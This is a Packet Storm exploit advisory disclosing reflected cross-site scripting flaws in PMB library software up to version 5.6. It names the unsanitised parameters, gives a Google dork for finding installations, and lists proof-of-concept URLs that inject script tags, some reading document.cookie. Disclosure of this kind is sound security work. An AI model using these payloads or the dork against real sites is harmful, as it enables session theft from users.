PMB versions 5.6 and below suffer from a cross site scripting vulnerability.
dda11415737c7cc9fab61abc37019075bdc7d65d53068e6a505fda7f637e488d# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Date: 20-04-2020
# Exploit Author: 41-trk (Tarik Bakir)
# Email: tarikbak999[at]gmail.com
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6
-==== Vulnerability ====-
Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.
-==== POC ====-
http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1
================================
# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Date: 20-04-2020
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6
-==== Vulnerability ====-
Variable $page isn't properly sanitized in file /opac_css/term_search.php
Variable $id isn't properly sanitized in file /opac_css/ajax.php
-==== POC ====-
http://localhost/[PMB PATH]/opac_css/term_search.php?page='</script><script>alert(document.cookie)</script>
http://localhost/[PMB PATH]/opac_css/ajax.php?module=ajax&categ=liste_lecture&quoifaire=show_form&id='"<script>alert(document.cookie)</script>
================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed